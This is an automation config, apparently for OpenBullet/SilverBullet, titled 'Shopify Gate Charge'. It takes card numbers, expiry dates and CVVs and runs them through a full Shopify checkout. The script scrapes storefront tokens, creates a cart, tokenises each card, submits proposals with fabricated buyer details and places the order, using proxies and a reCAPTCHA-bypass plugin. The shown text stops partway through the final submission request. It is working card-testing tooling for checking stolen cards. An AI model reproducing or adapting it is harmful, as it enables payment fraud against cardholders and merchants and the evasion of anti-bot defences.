[SETTINGS]
{
  "Name": "Shopify Gate Charge Autoshopify All",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2026-01-25T00:00:00.0000000+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [
    "RecaptchaV3Bypass"
  ],
  "Author": "@Chr1shtopher",
  "Version": "2.0.0 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "shopify $2",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#site FUNCTION Constant "<site>" -> VAR "site" 

#CC FUNCTION Constant "<cc>" -> VAR "CC" 

#MES FUNCTION Constant "<mes>" -> VAR "MES" 

#ANO FUNCTION Constant "<ano>" -> VAR "ANO" 

#CVV FUNCTION Constant "<cvv>" -> VAR "CVV" 

!#ClearCookies FUNCTION ClearCookies 

# Step 1: Fetch products.json
REQUEST GET "https://<site>/products.json" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Pragma: no-cache" 

# Parse product_id and price from products.json  
# Parse variant ID (numeric, no quotes) - from first variant in products
variantid PARSE "<SOURCE>" LR "\"variants\":[{\"id\":" ",\"available\"" CreateEmpty=FALSE -> VAR "variantid" 

# Parse price - find price in the first variant (search from variants array start)
price PARSE "<SOURCE>" LR "\"variants\":[{\"id\":" "\"price\":\"" "\"," CreateEmpty=FALSE -> VAR "price" 

# Step 2: Get site homepage to extract accessToken
REQUEST GET "https://<site>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Pragma: no-cache" 

site_key PARSE "<SOURCE>" LR "\"accessToken\":\"" "\"" CreateEmpty=FALSE -> VAR "site_key" 

# Step 3: Create cart via GraphQL
REQUEST POST "https://<site>/api/unstable/graphql.json?operation_name=cartCreate" 
  CONTENT "{\"query\":\"mutation cartCreate($input:CartInput!$country:CountryCode$language:LanguageCode$withCarrierRates:Boolean=false)@inContext(country:$country language:$language){result:cartCreate(input:$input){...@defer(if:$withCarrierRates){cart{...CartParts}errors:userErrors{...on CartUserError{message field code}}warnings:warnings{...on CartWarning{code}}}}}fragment CartParts on Cart{id checkoutUrl deliveryGroups(first:10 withCarrierRates:$withCarrierRates){edges{node{id groupType selectedDeliveryOption{code title handle deliveryPromise deliveryMethodType estimatedCost{amount currencyCode}}deliveryOptions{code title handle deliveryPromise deliveryMethodType estimatedCost{amount currencyCode}}}}}cost{subtotalAmount{amount currencyCode}totalAmount{amount currencyCode}totalTaxAmount{amount currencyCode}totalDutyAmount{amount currencyCode}}discountAllocations{discountedAmount{amount currencyCode}...on CartCodeDiscountAllocation{code}...on CartAutomaticDiscountAllocation{title}...on CartCustomDiscountAllocation{title}}discountCodes{code applicable}lines(first:10){edges{node{quantity cost{subtotalAmount{amount currencyCode}totalAmount{amount currencyCode}}discountAllocations{discountedAmount{amount currencyCode}...on CartCodeDiscountAllocation{code}...on CartAutomaticDiscountAllocation{title}...on CartCustomDiscountAllocation{title}}merchandise{...on ProductVariant{requiresShipping}}sellingPlanAllocation{priceAdjustments{price{amount currencyCode}}sellingPlan{billingPolicy{...on SellingPlanRecurringBillingPolicy{interval intervalCount}}priceAdjustments{orderCount}recurringDeliveries}}}}}}\",\"variables\":{\"input\":{\"lines\":[{\"merchandiseId\":\"gid://shopify/ProductVariant/<variantid>\",\"quantity\":1,\"attributes\":[]}],\"discountCodes\":[]},\"country\":\"US\",\"language\":\"EN\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://<site>" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?0" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "X-SDK-Variant: portable-wallets" 
  HEADER "X-Shopify-Storefront-Access-Token: <site_key>" 
  HEADER "X-Start-Wallet-Checkout: true" 
  HEADER "X-Wallet-Name: MoreOptions" 

checkout_url PARSE "<SOURCE>" LR "\"checkoutUrl\":\"" "\"" CreateEmpty=FALSE -> VAR "checkout_url" 

# Step 4: Get checkout page
REQUEST GET "<checkout_url>?auto_redirect=false" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8" 
  HEADER "Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?1" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Pragma: no-cache" 

# Extract tokens from checkout page
paymentMethodIdentifier PARSE "<SOURCE>" LR "paymentMethodIdentifier&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "payment_idf" 

stable_id PARSE "<SOURCE>" LR "stableId&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "stable_id" 

queue_token PARSE "<SOURCE>" LR "queueToken&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "queue_token" 

currency_code PARSE "<SOURCE>" LR "currencyCode&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "currency_code" 

country_code PARSE "<SOURCE>" LR "countryCode&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "country_code" 

x_check PARSE "<SOURCE>" LR "serialized-session-token\" content=\"&quot;" "&quot;\"" CreateEmpty=FALSE -> VAR "x_check" 

tok PARSE "<SOURCE>" LR "serialized-source-token\" content=\"&quot;" "&quot;\"" CreateEmpty=FALSE -> VAR "tok" 

web_build PARSE "<SOURCE>" LR "\"sha\":\"" "\"" CreateEmpty=FALSE -> VAR "web_build" 

tax1 PARSE "<SOURCE>" LR "totalTaxAndDutyAmount&quot;:{&quot;value&quot;:{&quot;amount&quot;:&quot;" "&quot" CreateEmpty=FALSE -> VAR "tax1" 

gateway PARSE "<SOURCE>" LR "extensibilityDisplayName&quot;:&quot;" "&quot;" CreateEmpty=FALSE -> VAR "gateway" 

DMT PARSE "<SOURCE>" LR "deliveryMethodTypes&quot;:[&quot;" "&quot;],&quot;" CreateEmpty=FALSE -> VAR "DMT" 

# Step 5: Create payment session
REQUEST POST "https://checkout.pci.shopifyinc.com/sessions" 
  CONTENT "{\"credit_card\":{\"number\":\"<cc>\",\"month\":<mes>,\"year\":<ano>,\"verification_value\":\"<cvv>\",\"name\":\"Laka Lama\"},\"payment_session_scope\":\"<site>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-IN,en-GB;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://checkout.pci.shopifyinc.com" 
  HEADER "Referer: https://checkout.pci.shopifyinc.com/" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?0" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Pragma: no-cache" 

id PARSE "<SOURCE>" LR "{\"id\":\"" "\"}" CreateEmpty=FALSE -> VAR "id" 

# Step 6: First Proposal (Negotiate)
REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=Proposal" 
  CONTENT "{\"query\":\"query Proposal($alternativePaymentCurrency:AlternativePaymentCurrencyInput,$delivery:DeliveryTermsInput,$discounts:DiscountTermsInput,$payment:PaymentTermInput,$merchandise:MerchandiseTermInput,$buyerIdentity:BuyerIdentityTermInput,$taxes:TaxTermInput,$sessionInput:SessionTokenInput!,$checkpointData:String,$queueToken:String,$reduction:ReductionInput,$availableRedeemables:AvailableRedeemablesInput,$changesetTokens:[String!],$tip:TipTermInput,$note:NoteInput,$localizationExtension:LocalizationExtensionInput,$nonNegotiableTerms:NonNegotiableTermsInput,$scriptFingerprint:ScriptFingerprintInput,$transformerFingerprintV2:String,$optionalDuties:OptionalDutiesInput,$attribution:AttributionInput,$captcha:CaptchaInput,$poNumber:String,$saleAttributions:SaleAttributionsInput,$cartMetafields:[CartMetafieldOperationInput!],$memberships:MembershipsInput){session(sessionInput:$sessionInput){negotiate(input:{purchaseProposal:{alternativePaymentCurrency:$alternativePaymentCurrency,delivery:$delivery,discounts:$discounts,payment:$payment,merchandise:$merchandise,buyerIdentity:$buyerIdentity,taxes:$taxes,reduction:$reduction,availableRedeemables:$availableRedeemables,tip:$tip,note:$note,poNumber:$poNumber,nonNegotiableTerms:$nonNegotiableTerms,localizationExtension:$localizationExtension,scriptFingerprint:$scriptFingerprint,transformerFingerprintV2:$transformerFingerprintV2,optionalDuties:$optionalDuties,attribution:$attribution,captcha:$captcha,saleAttributions:$saleAttributions,cartMetafields:$cartMetafields,memberships:$memberships},checkpointData:$checkpointData,queueToken:$queueToken,changesetTokens:$changesetTokens}){__typename result{...on NegotiationResultAvailable{checkpointData queueToken buyerProposal{...BuyerProposalDetails __typename}sellerProposal{...ProposalDetails __typename}__typename}...on CheckpointDenied{redirectUrl __typename}...on Throttled{pollAfter queueToken pollUrl __typename}...on SubmittedForCompletion{receipt{...ReceiptDetails __typename}__typename}...on NegotiationResultFailed{__typename reportable}__typename}errors{code localizedMessage nonLocalizedMessage localizedMessageHtml...on RemoveTermViolation{target __typename}...on AcceptNewTermViolation{target __typename}...on ConfirmChangeViolation{from to __typename}...on UnprocessableTermViolation{target __typename}...on UnresolvableTermViolation{target __typename}...on ApplyChangeViolation{target from{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}to{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}__typename}...on InputValidationError{field __typename}...on PendingTermViolation{__typename}__typename}}__typename}}\",\"variables\":{\"sessionInput\":{\"sessionToken\":\"<x_check>\"},\"queueToken\":\"<queue_token>\",\"discounts\":{\"lines\":[],\"acceptUnexpectedDiscounts\":true},\"delivery\":{\"deliveryLines\":[{\"destination\":{\"partialStreetAddress\":{\"address1\":\"7 street\",\"city\":\"california\",\"countryCode\":\"US\",\"postalCode\":\"90001\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"CA\",\"phone\":\"16125626619\",\"oneTimeUse\":false}},\"selectedDeliveryStrategy\":{\"deliveryStrategyMatchingConditions\":{\"estimatedTimeInTransit\":{\"any\":true},\"shipments\":{\"any\":true}},\"options\":{}},\"targetMerchandiseLines\":{\"any\":true},\"deliveryMethodTypes\":[\"SHIPPING\"],\"expectedTotalPrice\":{\"any\":true},\"destinationChanged\":false}],\"noDeliveryRequired\":[],\"useProgressiveRates\":false,\"prefetchShippingRatesStrategy\":null,\"supportsSplitShipping\":true},\"deliveryExpectations\":{\"deliveryExpectationLines\":[]},\"merchandise\":{\"merchandiseLines\":[{\"stableId\":\"<stable_id>\",\"merchandise\":{\"productVariantReference\":{\"id\":\"gid://shopify/ProductVariantMerchandise/<variantid>\",\"variantId\":\"gid://shopify/ProductVariant/<variantid>\",\"properties\":[],\"sellingPlanId\":null,\"sellingPlanDigest\":null}},\"quantity\":{\"items\":{\"value\":1}},\"expectedTotalPrice\":{\"value\":{\"amount\":\"<price>\",\"currencyCode\":\"<currency_code>\"}},\"lineComponentsSource\":null,\"lineComponents\":[]}]},\"memberships\":{\"memberships\":[]},\"payment\":{\"totalAmount\":{\"any\":true},\"paymentLines\":[],\"billingAddress\":{\"streetAddress\":{\"address1\":\"7 street\",\"city\":\"california\",\"countryCode\":\"US\",\"postalCode\":\"90001\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"CA\",\"phone\":\"16125626619\"}}},\"buyerIdentity\":{\"customer\":{\"presentmentCurrency\":\"<currency_code>\",\"countryCode\":\"<country_code>\"},\"email\":\"gmail123456@gmail.com\",\"emailChanged\":false,\"phoneCountryCode\":\"<country_code>\",\"marketingConsent\":[],\"shopPayOptInPhone\":{\"countryCode\":\"<country_code>\"},\"rememberMe\":false},\"tip\":{\"tipLines\":[]},\"taxes\":{\"proposedAllocations\":null,\"proposedTotalAmount\":{\"value\":{\"amount\":\"<tax1>\",\"currencyCode\":\"<currency_code>\"}},\"proposedTotalIncludedAmount\":null,\"proposedMixedStateTotalAmount\":null,\"proposedExemptions\":[]},\"note\":{\"message\":null,\"customAttributes\":[]},\"localizationExtension\":{\"fields\":[]},\"nonNegotiableTerms\":null,\"scriptFingerprint\":{\"signature\":null,\"signatureUuid\":null,\"lineItemScriptChanges\":[],\"paymentScriptChanges\":[],\"shippingScriptChanges\":[]},\"optionalDuties\":{\"buyerRefusesDuties\":false},\"captcha\":null,\"cartMetafields\":[]},\"operationName\":\"Proposal\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-IN" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://<site>" 
  HEADER "Referer: https://<site>" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?0" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Shopify-Checkout-Client: checkout-web/1.0" 
  HEADER "X-Checkout-One-Session-Token: <x_check>" 
  HEADER "X-Checkout-Web-Build-Id: <web_build>" 
  HEADER "X-Checkout-Web-Deploy-Stage: production" 
  HEADER "X-Checkout-Web-Server-Handling: fast" 
  HEADER "X-Checkout-Web-Server-Rendering: yes" 
  HEADER "X-Checkout-Web-Source-Id: <tok>" 
  HEADER "Pragma: no-cache" 

tax2 PARSE "<SOURCE>" LR "\"totalTaxAndDutyAmount\":{\"value\":{\"amount\":\"" "\"" CreateEmpty=FALSE -> VAR "tax2" 

handle PARSE "<SOURCE>" LR "\"handle\":\"" "\"" CreateEmpty=FALSE -> VAR "handle" 

amount PARSE "<SOURCE>" LR "\"amount\":{\"amount\":\"" "\"" CreateEmpty=FALSE -> VAR "amount" 

total PARSE "<SOURCE>" LR "\"checkoutTotal\":{\"value\":{\"amount\":\"" "\"" CreateEmpty=FALSE -> VAR "total" 

# Step 7: Second Proposal (Negotiate) - Same as first but with updated deliveryMethodTypes
REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=Proposal" 
  CONTENT "{\"query\":\"query Proposal($alternativePaymentCurrency:AlternativePaymentCurrencyInput,$delivery:DeliveryTermsInput,$discounts:DiscountTermsInput,$payment:PaymentTermInput,$merchandise:MerchandiseTermInput,$buyerIdentity:BuyerIdentityTermInput,$taxes:TaxTermInput,$sessionInput:SessionTokenInput!,$checkpointData:String,$queueToken:String,$reduction:ReductionInput,$availableRedeemables:AvailableRedeemablesInput,$changesetTokens:[String!],$tip:TipTermInput,$note:NoteInput,$localizationExtension:LocalizationExtensionInput,$nonNegotiableTerms:NonNegotiableTermsInput,$scriptFingerprint:ScriptFingerprintInput,$transformerFingerprintV2:String,$optionalDuties:OptionalDutiesInput,$attribution:AttributionInput,$captcha:CaptchaInput,$poNumber:String,$saleAttributions:SaleAttributionsInput,$cartMetafields:[CartMetafieldOperationInput!],$memberships:MembershipsInput){session(sessionInput:$sessionInput){negotiate(input:{purchaseProposal:{alternativePaymentCurrency:$alternativePaymentCurrency,delivery:$delivery,discounts:$discounts,payment:$payment,merchandise:$merchandise,buyerIdentity:$buyerIdentity,taxes:$taxes,reduction:$reduction,availableRedeemables:$availableRedeemables,tip:$tip,note:$note,poNumber:$poNumber,nonNegotiableTerms:$nonNegotiableTerms,localizationExtension:$localizationExtension,scriptFingerprint:$scriptFingerprint,transformerFingerprintV2:$transformerFingerprintV2,optionalDuties:$optionalDuties,attribution:$attribution,captcha:$captcha,saleAttributions:$saleAttributions,cartMetafields:$cartMetafields,memberships:$memberships},checkpointData:$checkpointData,queueToken:$queueToken,changesetTokens:$changesetTokens}){__typename result{...on NegotiationResultAvailable{checkpointData queueToken buyerProposal{...BuyerProposalDetails __typename}sellerProposal{...ProposalDetails __typename}__typename}...on CheckpointDenied{redirectUrl __typename}...on Throttled{pollAfter queueToken pollUrl __typename}...on SubmittedForCompletion{receipt{...ReceiptDetails __typename}__typename}...on NegotiationResultFailed{__typename reportable}__typename}errors{code localizedMessage nonLocalizedMessage localizedMessageHtml...on RemoveTermViolation{target __typename}...on AcceptNewTermViolation{target __typename}...on ConfirmChangeViolation{from to __typename}...on UnprocessableTermViolation{target __typename}...on UnresolvableTermViolation{target __typename}...on ApplyChangeViolation{target from{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}to{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}__typename}...on InputValidationError{field __typename}...on PendingTermViolation{__typename}__typename}}__typename}}\",\"variables\":{\"sessionInput\":{\"sessionToken\":\"<x_check>\"},\"queueToken\":\"<queue_token>\",\"discounts\":{\"lines\":[],\"acceptUnexpectedDiscounts\":true},\"delivery\":{\"deliveryLines\":[{\"destination\":{\"partialStreetAddress\":{\"address1\":\"7 street\",\"city\":\"california\",\"countryCode\":\"US\",\"postalCode\":\"90001\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"CA\",\"phone\":\"16125626619\",\"oneTimeUse\":false}},\"selectedDeliveryStrategy\":{\"deliveryStrategyMatchingConditions\":{\"estimatedTimeInTransit\":{\"any\":true},\"shipments\":{\"any\":true}},\"options\":{}},\"targetMerchandiseLines\":{\"any\":true},\"deliveryMethodTypes\":[\"SHIPPING\",\"LOCAL\"],\"expectedTotalPrice\":{\"any\":true},\"destinationChanged\":false}],\"noDeliveryRequired\":[],\"useProgressiveRates\":false,\"prefetchShippingRatesStrategy\":null,\"supportsSplitShipping\":true},\"deliveryExpectations\":{\"deliveryExpectationLines\":[]},\"merchandise\":{\"merchandiseLines\":[{\"stableId\":\"<stable_id>\",\"merchandise\":{\"productVariantReference\":{\"id\":\"gid://shopify/ProductVariantMerchandise/<variantid>\",\"variantId\":\"gid://shopify/ProductVariant/<variantid>\",\"properties\":[],\"sellingPlanId\":null,\"sellingPlanDigest\":null}},\"quantity\":{\"items\":{\"value\":1}},\"expectedTotalPrice\":{\"value\":{\"amount\":\"<price>\",\"currencyCode\":\"<currency_code>\"}},\"lineComponentsSource\":null,\"lineComponents\":[]}]},\"memberships\":{\"memberships\":[]},\"payment\":{\"totalAmount\":{\"any\":true},\"paymentLines\":[],\"billingAddress\":{\"streetAddress\":{\"address1\":\"7 street\",\"city\":\"california\",\"countryCode\":\"US\",\"postalCode\":\"90001\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"CA\",\"phone\":\"16125626619\"}}},\"buyerIdentity\":{\"customer\":{\"presentmentCurrency\":\"<currency_code>\",\"countryCode\":\"<country_code>\"},\"email\":\"gmail123456@gmail.com\",\"emailChanged\":false,\"phoneCountryCode\":\"<country_code>\",\"marketingConsent\":[],\"shopPayOptInPhone\":{\"countryCode\":\"<country_code>\"},\"rememberMe\":false},\"tip\":{\"tipLines\":[]},\"taxes\":{\"proposedAllocations\":null,\"proposedTotalAmount\":{\"value\":{\"amount\":\"<tax2>\",\"currencyCode\":\"<currency_code>\"}},\"proposedTotalIncludedAmount\":null,\"proposedMixedStateTotalAmount\":null,\"proposedExemptions\":[]},\"note\":{\"message\":null,\"customAttributes\":[]},\"localizationExtension\":{\"fields\":[]},\"nonNegotiableTerms\":null,\"scriptFingerprint\":{\"signature\":null,\"signatureUuid\":null,\"lineItemScriptChanges\":[],\"paymentScriptChanges\":[],\"shippingScriptChanges\":[]},\"optionalDuties\":{\"buyerRefusesDuties\":false},\"captcha\":null,\"cartMetafields\":[]},\"operationName\":\"Proposal\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.6367.207 Safari/537.36" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Language: en-IN" 
  HEADER "Content-Type: application/json" 
  HEADER "Origin: https://<site>" 
  HEADER "Referer: https://<site>" 
  HEADER "Sec-CH-UA: \"Chromium\";v=\"137\", \"Not/A)Brand\";v=\"24\"" 
  HEADER "Sec-CH-UA-Mobile: ?0" 
  HEADER "Sec-CH-UA-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Shopify-Checkout-Client: checkout-web/1.0" 
  HEADER "X-Checkout-One-Session-Token: <x_check>" 
  HEADER "X-Checkout-Web-Build-Id: <web_build>" 
  HEADER "X-Checkout-Web-Deploy-Stage: production" 
  HEADER "X-Checkout-Web-Server-Handling: fast" 
  HEADER "X-Checkout-Web-Server-Rendering: yes" 
  HEADER "X-Checkout-Web-Source-Id: <tok>" 
  HEADER "Pragma: no-cache" 

tax3 PARSE "<SOURCE>" LR "\"totalTaxAndDutyAmount\":{\"value\":{\"amount\":\"" "\"" CreateEmpty=FALSE -> VAR "tax3" 

# Step 8: Submit for Completion
REQUEST POST "https://<site>/checkouts/unstable/graphql?operationName=SubmitForCompletion" 
  CONTENT "{\"query\":\"mutation SubmitForCompletion($input:NegotiationInput!,$attemptToken:String!,$metafields:[MetafieldInput!],$postPurchaseInquiryResult:PostPurchaseInquiryResultCode,$analytics:AnalyticsInput){submitForCompletion(input:$input attemptToken:$attemptToken metafields:$metafields postPurchaseInquiryResult:$postPurchaseInquiryResult analytics:$analytics){...on SubmitSuccess{receipt{...ReceiptDetails __typename}__typename}...on SubmitAlreadyAccepted{receipt{...ReceiptDetails __typename}__typename}...on SubmitFailed{reason __typename}...on SubmitRejected{buyerProposal{...BuyerProposalDetails __typename}sellerProposal{...ProposalDetails __typename}errors{...on NegotiationError{code localizedMessage nonLocalizedMessage localizedMessageHtml...on RemoveTermViolation{message{code localizedDescription __typename}target __typename}...on AcceptNewTermViolation{message{code localizedDescription __typename}target __typename}...on ConfirmChangeViolation{message{code localizedDescription __typename}from to __typename}...on UnprocessableTermViolation{message{code localizedDescription __typename}target __typename}...on UnresolvableTermViolation{message{code localizedDescription __typename}target __typename}...on ApplyChangeViolation{message{code localizedDescription __typename}target from{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}to{...on ApplyChangeValueInt{value __typename}...on ApplyChangeValueRemoval{value __typename}...on ApplyChangeValueString{value __typename}__typename}__typename}...on InputValidationError{field __typename}...on PendingTermViolation{__typename}__typename}__typename}__typename}...on Throttled{pollAfter pollUrl queueToken buyerProposal{...BuyerProposalDetails __typename}__typename}...on CheckpointDenied{redirectUrl __typename}...on TooManyAttempts{redirectUrl __typename}...on SubmittedForCompletion{receipt{...ReceiptDetails __typename}__typename}__typename}}\",\"variables\":{\"input\":{\"sessionInput\":{\"sessionToken\":\"<x_check>\"},\"queueToken\":\"<queue_token>\",\"discounts\":{\"lines\":[],\"acceptUnexpectedDiscounts\":true},\"delivery\":{\"deliveryLines\":[{\"selectedDeliveryStrategy\":{\"deliveryStrategyMatchingConditions\":{\"estimatedTimeInTransit\":{\"any\":true},\"shipments\":{\"any\":true}},\"options\":{\"phone\":\"12195154586\"}},\"targetMerchandiseLines\":{\"lines\":[{\"stableId\":\"<stable_id>\"}]},\"deliveryMethodTypes\":[\"<DMT>\"],\"expectedTotalPrice\":{\"value\":{\"amount\":\"<amount>\",\"currencyCode\":\"<currency_code>\"}},\"destinationChanged\":true}],\"noDeliveryRequired\":[],\"useProgressiveRates\":false,\"prefetchShippingRatesStrategy\":null,\"supportsSplitShipping\":true},\"deliveryExpectations\":{\"deliveryExpectationLines\":[]},\"merchandise\":{\"merchandiseLines\":[{\"stableId\":\"<stable_id>\",\"merchandise\":{\"productVariantReference\":{\"id\":\"gid://shopify/ProductVariantMerchandise/<variantid>\",\"variantId\":\"gid://shopify/ProductVariant/<variantid>\",\"properties\":[],\"sellingPlanId\":null,\"sellingPlanDigest\":null}},\"quantity\":{\"items\":{\"value\":1}},\"expectedTotalPrice\":{\"value\":{\"amount\":\"<price>\",\"currencyCode\":\"<currency_code>\"}},\"lineComponentsSource\":null,\"lineComponents\":[]}]},\"memberships\":{\"memberships\":[]},\"payment\":{\"totalAmount\":{\"any\":true},\"paymentLines\":[{\"paymentMethod\":{\"directPaymentMethod\":{\"paymentMethodIdentifier\":\"<payment_idf>\",\"sessionId\":\"<id>\",\"billingAddress\":{\"streetAddress\":{\"address1\":\"7 street\",\"city\":\"california\",\"countryCode\":\"US\",\"postalCode\":\"90001\",\"firstName\":\"Laka\",\"lastName\":\"Lama\",\"zoneCode\":\"CA\",\"phone\":\"16125626619\"}},\"cardSource\":null},\"giftCardPaymentMethod\":null,\"redeemablePaymentMethod\":null,\"walletPaymentMethod\":null,\"walletsPlatformPaymentMethod\":null,\"localPaymentMethod\":null,\"paymentOnDeliveryMethod\":null,\"paymentOnDeliveryMethod2\":null,\"manualPaymentMethod\":null,\"customPaymentMethod\":null,\"offsitePaymentMethod\":null,\"customOnsitePaymentMethod\":null,\"deferredPaymentMethod\":null,\"customerCreditCardPaymentMethod\":null,\"paypalBillingAgreementPaymentMethod\":null,\"remotePaymentInstrument\":null},\"amount\":{\"value\":{\"amount\":\"<total>\",\"currencyCode\":\"<currency_code>\"}}}],\"billingAddress\":{\"streetAddress\":{\"address1\":\"7 